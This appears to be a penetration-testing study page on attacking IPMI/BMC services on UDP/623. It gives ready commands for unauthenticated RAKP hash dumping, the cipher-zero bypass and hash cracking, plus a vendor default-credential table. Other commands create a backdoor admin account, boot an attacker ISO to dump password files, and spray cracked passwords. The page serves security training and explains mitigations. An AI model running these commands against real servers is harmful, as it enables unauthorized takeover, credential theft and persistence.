Skip to Content

IPMI - Port 623 (UDP)

UDP/623 is Intelligent Platform Management Interface (IPMI) one of the highest-value findings on any network. The IPMI 2.0 RAKP protocol has a specification flaw that lets you extract HMAC-SHA1 password hashes for any valid user with no authentication, there is no patch and never will be. Combined with vendor default credentials and the cipher-zero bypass, BMCs are routinely the fastest path from “scan complete” to physical-equivalent control of every server in the rack.

Cheatsheet

# Discovery nmap -sU --script ipmi-version -p623 <IP> nmap -sU -sV -p623 <IP> nmap -sU -p623 --script ipmi-version <SUBNET>/24 -oA ipmi-sweep # Sweep a subnet for BMCs(Baseboard Management Controllers) # RAKP hash dump single highest-value action, no creds required msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS <IP>; set OUTPUT_HASHCAT_FILE ipmi.txt; run" # Cipher zero auth bypass (CVE-2013-4786) msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_cipher_zero; set RHOSTS <IP>; run" ipmitool -I lanplus -C 0 -H <IP> -U <USER> -P <PASS> user list # Crack RAKP hashes (hashcat mode 7300) hashcat -m 7300 ipmi.txt <WORDLIST> hashcat -m 7300 ipmi.txt <WORDLIST> -r /usr/share/hashcat/rules/best64.rule hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u # HP iLO default mask (8 char [A-Z0-9]) john --format=rakp --wordlist=<WORDLIST> ipmi.txt # Vendor default credentials checkout https://github.com/netbiosX/Default-Credentials/blob/master/IPMI-Default-Password-List.mdown # Authenticated BMC operations (lanplus = IPMI 2.0) ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> user list # Enumerate accounts ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> lan print # IP, MAC, gateway, mgmt VLAN ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> sel list # System event log ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> chassis status # Power state # Backdoor admin user (persistence) ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> user set name 4 backdoor ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> user set password 4 <PASS> ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> user priv 4 4 ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> user enable 4

Methodology

Follow this checklist whenever UDP/623 is open or suspected. BMC compromise is functionally equivalent to physical access, boot from an attacker ISO, mount disks offline, reset the local admin password, persist below the OS. The RAKP hash dump is unauthenticated and has no fix; run it first. Spray every cracked password against the host OS and every other BMC in scope.

Phase 1: Detect and Fingerprint

?

ask yourself

  • Is IPMI 2.0 (RAKP-vulnerable) or only legacy 1.5 in play, and which cipher suites are accepted?
  • What is the OEM vendor (Dell, HP, Supermicro, IBM, Cisco), and which defaults and password format does that imply?
  • Are there companion management surfaces, web GUI on 80/443, SMASH-CLP on 22/23 that give more than IPMI-over-UDP?
# Fingerprint protocol version, cipher suites, and OEM vendor ID nmap -sU --script ipmi-version -p623 <IP> nmap -sU -sV -p623 <IP> # Metasploit version detection msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_version; set RHOSTS <IP>; run"
  • nmap -sU --script ipmi-version -p623 <IP>: confirms IPMI is live and fingerprints the version (1.5 vs 2.0), supported cipher suites, available auth types, and the OEM vendor ID (which usually identifies the hardware).
  • Check ports 80/443 on the same host, most BMCs expose a web console (iLO, iDRAC, Supermicro IPMI Web) with virtual console and ISO mounting that IPMI-over-UDP lacks.
  • Check for SSH (22) and Telnet (23) on the same IP many BMCs expose SMASH-CLP or a vendor CLI there.
  • Note the OEM vendor it dictates which default credentials to try (Phase 2) and the likely password format for the RAKP mask attack (Phase 5).

Phase 2: Default Credentials

?

ask yourself

  • Which vendor defaults match the OEM identified in Phase 1?
  • Has this BMC ever been re-provisioned, or is it management-plane gear configured once and forgotten?
  • If IPMI-over-LAN rejects defaults, does the web GUI (443) still accept them?
  • If a default works, is the same username/password reused on the host OS?
# Vendor defaults via ipmitool (lanplus = IPMI 2.0) ipmitool -I lanplus -H <IP> -U root -P calvin user list # Dell iDRAC ipmitool -I lanplus -H <IP> -U ADMIN -P ADMIN user list # Supermicro ipmitool -I lanplus -H <IP> -U USERID -P PASSW0RD user list # IBM/Lenovo (zero, not O) ipmitool -I lanplus -H <IP> -U admin -P password user list # Cisco CIMC ipmitool -I lanplus -H <IP> -U root -P changeme user list # Oracle ILOM
  • Try vendor defaults first they work alarmingly often on hardware deployed years ago and never re-provisioned.
  • Vendor default credentials 
  • HP iLO uses Administrator:<8-char random> from the chassis sticker if you cannot read the sticker, mask-attack the RAKP hash (Phase 5) instead.
  • Try the same defaults against the web interface (443) some BMCs lock IPMI-over-LAN but leave the web GUI on defaults.
  • If a default works, immediately spray that username/password against the host OS admins frequently sync BMC and root/Administrator credentials.

Phase 3: RAKP Hash Dump (IPMI 2.0 — CVE-2013-4786)

?

ask yourself

  • Does the BMC speak IPMI 2.0 (the only version with the RAKP flaw)?
  • Which usernames exist on the BMC, and what naming convention do they reveal?
  • Could any of those usernames also be valid OS accounts on the underlying host?
  • Should I dump the whole subnet at once to catch a shared admin password across the fleet?
# Dump a salted HMAC-SHA1 hash for every valid BMC user msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS <IP>; set OUTPUT_HASHCAT_FILE ipmi.txt; run" # Same against an entire subnet of BMCs in one run msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS <SUBNET>/24; set OUTPUT_HASHCAT_FILE ipmi.txt; run"
  • ipmi_dumphashes with OUTPUT_HASHCAT_FILE the single highest-value action against IPMI. Returns a salted HMAC-SHA1 hash for every valid user, with no credentials required.
  • Run it against the whole subnet (set RHOSTS <SUBNET>/24) if you found multiple BMCs one run can produce dozens of hashes that may share a common admin password.
  • Note every username returned even if uncrackable usernames are intelligence (naming conventions, likely OS accounts).
  • Output is hashcat mode 7300 format (<user>:$rakp$<salt>$<hash>). Start cracking (Phase 5) while you continue enumerating.
?

Why is the RAKP flaw uniquely devastating? It is a protocol-specification flaw, not an implementation bug. The IPMI 2.0 spec mandates that in RAKP message 2 the BMC sends a salted HMAC-SHA1 of the user’s password to the client before the client proves it knows that password. Every spec-compliant BMC is “vulnerable” and there is no patch fixing it would break IPMI 2.0. The only mitigations are strong passwords, segmenting BMCs onto a dedicated management VLAN, and disabling IPMI-over-LAN in favor of Redfish/HTTPS.

Phase 4: Cipher Zero Auth Bypass

?

ask yourself

  • Does this BMC accept cipher suite 0 (a common factory-default misconfiguration)?
  • Which username should I pair it with and do I have a username list from the Phase 3 dump?
  • If cipher zero works, can I skip cracking entirely and go straight to BMC operations?
  • Will every subsequent command need the -C 0 flag to stay on the bypass session?
# Confirm cipher zero acceptance msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_cipher_zero; set RHOSTS <IP>; run" # Authenticate as any existing user with any password ipmitool -I lanplus -C 0 -H <IP> -U Administrator -P <PASS> user list
  • ipmi_cipher_zero module confirms whether the BMC accepts cipher suite 0 (no auth, no integrity, no confidentiality).
  • ipmitool -I lanplus -C 0 -H <IP> -U <USER> -P <PASS> user listif cipher 0 is enabled, any password is accepted as long as the username exists. Pair -C 0 with a real username from the Phase 3 dump.
  • If cipher zero works, you have full BMC access without cracking a single hash proceed straight to Phase 6.
  • Keep the -C 0 flag on every subsequent ipmitool command to stay on the bypass session.

Phase 5: Hash Cracking

?

ask yourself

  • Is the target an HP iLO, where the 8-char [A-Z0-9] default keyspace is fully exhaustible?
  • Will a plain dictionary suffice, or do I need rules/masks for this vendor’s password policy?
  • Do I have GPU access for hashcat, or do I fall back to John?
  • The instant a hash cracks, which services and hosts do I spray the cleartext against?
# Baseline dictionary (RAKP HMAC-SHA1 cracks at multi-GH/s fast) hashcat -m 7300 ipmi.txt <WORDLIST> # Dictionary + rules for higher coverage hashcat -m 7300 ipmi.txt <WORDLIST> -r /usr/share/hashcat/rules/best64.rule # HP iLO factory default: 8 chars from [A-Z0-9] hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u # CPU-only fallback john --format=rakp --wordlist=<WORDLIST> ipmi.txt
  • hashcat -m 7300 ipmi.txt <WORDLIST> start with rockyou. RAKP cracks at multiple GH/s, so dictionary + best64 finishes in seconds.
  • HP iLO targets: mask attack -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u. HP’s factory default is exactly 8 chars from [A-Z0-9]; the ~2.8-trillion keyspace is exhaustible in hours on one GPU.
  • If dictionary fails: add best64.rule, then OneRuleToRuleThemAll.rule for broader coverage.
  • john --format=rakp is the CPU-only fallback when no GPU is available.
  • The instant a hash cracks, spray the cleartext against every OS service on every host in scope BMC and host admin passwords are routinely identical.

Move to Phase 6 as soon as any credential is recovered (cracked, default, or cipher-zero).

Phase 6: BMC Exploitation (With Valid Credentials)

?

ask yourself

  • What does lan print reveal about the management VLAN and adjacent BMCs?
  • Is the web GUI (virtual console + virtual media) reachable, enabling offline disk access?
  • Is power-cycling actually authorized for this host and window, or must I stay silent?
  • What persistence (backdoor BMC user) is in scope, and how do I keep it hidden from the web GUI?
# Enumerate accounts and privilege levels (4 = Administrator) ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> user list # Dump BMC network config IP, MAC, gateway, VLAN tag ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> lan print # Boot history / hardware events ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> sel list # Offline-disk-access chain (authorized maintenance window only) ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> chassis bootdev cdrom options=efiboot ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> chassis power reset
  • user list enumerate every BMC account including disabled ones; note privilege levels (4 = Administrator).
  • lan print dumps IP, MAC, gateway, default route, and VLAN tag. The VLAN ID frequently identifies an isolated management network full of other BMCs and jump hosts (feeds Phase 7).
  • sel list boot history, power events, and hardware faults; boot strings often leak the host OS/bootloader for fingerprinting.
  • Access the web GUI (443) with the same credentials for virtual console (KVM-over-IP) and virtual media (mount an attacker ISO).
  • Virtual media + boot order = root: mount a Kali live ISO, set next boot to virtual CD, hard-reset, boot your own OS with full disk access. Mount the host filesystems, dump SAM/SYSTEM or /etc/shadow, edit sudoers, drop SSH keys OS-level admin without ever exploiting the host.
  • For persistence (if in scope): create a backdoor user in a free slot (user set name/password, user priv 4, user enable).

Quiz

You cracked an HP iLO RAKP hash for user Administrator and the password is 8X3KQRP2. The host (10.10.5.20) also exposes SSH/22, HTTPS/443 (iLO web), and SMB/445. What is your highest-priority next move?

Overview

IPMI (Intelligent Platform Management Interface) is an out-of-band hardware management standard implemented by a dedicated microcontroller called the BMC (Baseboard Management Controller). The BMC runs its own firmware on a separate processor, has its own (or a shared sideband) NIC, and operates independently of the host OS, BIOS, and main CPU. As long as standby power is connected the BMC is online and reachable, even with the server powered off.

That independence is why it is such a rich target. Compromising a BMC means controlling the server below the OS, below the hypervisor, and below any endpoint security on the host. BMC access enables power control, arbitrary boot media, host RAM access via DCMI, and firmware-level implants that survive OS reinstalls.

DetailValue
Port623/UDP (IPMI/RMCP+)
Web Interfaces80/443 (iLO, iDRAC, Supermicro IPMI Web, Cisco CIMC, Lenovo XCC)
Vendor CLI22/TCP SSH (SMASH-CLP), 23/TCP Telnet (legacy)
Protocol VersionsIPMI 1.5 (legacy), IPMI 2.0 (current, RAKP-vulnerable)
ComponentBMC (Baseboard Management Controller)
Modern SuccessorRedfish (HTTPS REST API on 443)

Capabilities granted by BMC access: power on/off/reset/cycle; full KVM-over-IP virtual console; mount virtual ISO/USB media; modify BIOS/UEFI settings and boot order; read hardware sensors; view/clear the system event log; firmware changes (some vendors); direct memory access via DCMI on supported hardware.

BMC compromise is functionally equivalent to physical access to the server. An attacker with BMC admin can boot from an attacker ISO, mount the disks offline, reset the local Administrator password, install rootkits, and persist firmware-level implants all without touching the host OS or triggering host-based detection. Treat every cracked BMC credential as a “physical break-in” finding in the report.

RAKP Vulnerability Deep Dive

The Remote Authenticated Key-Exchange Protocol (RAKP) is the IPMI 2.0 over-LAN authentication handshake. The four-message exchange is supposed to mutually authenticate client and BMC without transmitting the password. The flaw is in RAKP message 2: the BMC sends a salted HMAC of the user’s password (HMAC-SHA1, HMAC-MD5, or HMAC-SHA256 depending on negotiated cipher suite) before the client has proven it knows the password.

Attack flow:

  1. Attacker sends RAKP message 1 (session open) specifying an arbitrary username.
  2. BMC checks whether that username exists in its user table.
  3. If the user exists, the BMC computes HMAC(password, salt) and returns it as RAKP message 2.
  4. Attacker captures the hash, takes it offline, and cracks it at multi-GH/s on a GPU.
  5. The attacker never sent a valid password — the protocol mandates the hash be sent first.
# ipmi_dumphashes output format (hashcat mode 7300): Administrator:$rakp$<salt_hex>$<hash_hex>

There is no fix for this. It is part of the IPMI 2.0 specification and cannot be patched without breaking compatibility. The RAKP authentication hash exposure is tracked as CVE-2013-4786; vendors (Dell, HP, Supermicro, IBM) all confirmed it in 2013, but none ship a “patched” version. Mitigations: strong passwords (>12 chars, high entropy), strict segmentation onto an isolated management VLAN with no routing to user networks, and disabling IPMI-over-LAN in favor of Redfish/HTTPS on modern hardware. Last verified: 2026-06.

Cipher Zero Authentication Bypass

IPMI 2.0 negotiates a cipher suite at session establishment. Cipher suite 0 is a special spec value meaning “no authentication, no integrity, no confidentiality.” Many BMC vendors shipped factory-default configurations that accepted cipher 0 so a client requesting it could authenticate as any existing user with any password.

# Test for cipher zero acceptance if it returns the user list, full access without cracking ipmitool -I lanplus -C 0 -H <IP> -U Administrator -P <PASS> user list

The fix requires explicitly disabling cipher 0 in BMC configuration, which many administrators never do. Combine cipher zero with username intelligence from the RAKP hash dump for authenticated BMC admin access without cracking a single hash.

Default Credentials

ProductUsernamePasswordNotes
Dell iDRACrootcalvinMost common BMC default in the wild — always try first
HP iLOAdministrator8-char [A-Z0-9] randomOn chassis sticker, mask-attackable
Supermicro IPMIADMINADMINCase-sensitive, common on whitebox servers
IBM IMM / Lenovo XCCUSERIDPASSW0RDNote the zero in PASSW0RD
Cisco CIMCadminpasswordCisco UCS C-series rack servers
Oracle ILOMrootchangemeOracle/Sun servers
Fujitsu iRMCadminadminFujitsu PRIMERGY
Hitachi BMCrootcmb9.userHitachi blade servers

HP iLO factory-default passwords are randomized 8-character strings from [A-Z0-9]. The keyspace is 36^8 ≈ 2.8 × 10^12 exhaustible on a single modern GPU in well under a day for RAKP HMAC-SHA1. Mask attack: hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u. If the host has not been re-provisioned since deployment, you crack the iLO password by force.

BMC Web Interfaces

Most BMCs expose web consoles with far more functionality than IPMI-over-UDP. Always check 80 and 443 in parallel with the UDP/623 enumeration.

VendorInterfaceDefault PortKey Features
HPiLO (Integrated Lights-Out)443Virtual console, ISO mount, power control, firmware update
DelliDRAC443Virtual console, virtual media, Lifecycle Controller, racadm CLI
SupermicroIPMI Web80/443Virtual console (Java), virtual media, BIOS update
CiscoCIMC443Full hardware management, KVM, vMedia
LenovoXClarity Controller443Hardware management, remote console, firmware update
FujitsuiRMC S5443iRMC web GUI, AVR (advanced video redirection)

The web interface is usually the path of least resistance once you have credentials. Virtual console (KVM-over-IP) gives you keyboard, monitor, and mouse on the physical server at BIOS/bootloader/login. Virtual media presents an uploaded ISO to the host as a CD-ROM. Together they give offline disk access via a Kali live boot, bypassing every host-based control.

ipmitool Reference

# Installation sudo apt install ipmitool # General syntax (lanplus = IPMI 2.0 over LAN) ipmitool -I lanplus -H <IP> -U <USER> -P <PASS> <command> # Cipher zero bypass (if vulnerable) ipmitool -I lanplus -C 0 -H <IP> -U <USER> -P <PASS> <command> # User management ipmitool ... user list # List all configured users ipmitool ... user set name <ID> <NAME> # Set username at slot ID ipmitool ... user set password <ID> <PASS> # Set password ipmitool ... user enable <ID> # Enable user account ipmitool ... user priv <ID> 4 # Privilege level (4 = Administrator) # Chassis control ipmitool ... chassis status # Power state, fault flags ipmitool ... chassis power on # Soft power on ipmitool ... chassis power off # Soft power off ipmitool ... chassis power cycle # Power cycle (off then on) ipmitool ... chassis power reset # Hard reset (warm reboot) ipmitool ... chassis bootdev pxe # Set next boot to PXE ipmitool ... chassis bootdev cdrom # Set next boot to virtual CD ipmitool ... chassis identify # Blink the chassis ID LED # Network configuration (BMC NIC) ipmitool ... lan print # Show IP, MAC, gateway, VLAN # System event log ipmitool ... sel list # All recorded events ipmitool ... sel elist # Extended (parsed) listing ipmitool ... sel clear # Wipe the event log # Sensor and FRU data ipmitool ... sensor list # All sensor readings ipmitool ... sdr list # Sensor data repository ipmitool ... fru print # Model, serial, manufacturer

#PenetrationTesting #RedTeam #Certification #Linux #IPMI #BMC #RAKP #Hashcat #Metasploit #ServiceEnum #CVE #iDRAC #iLO #Supermicro #Hardware #HashCracking

Last updated on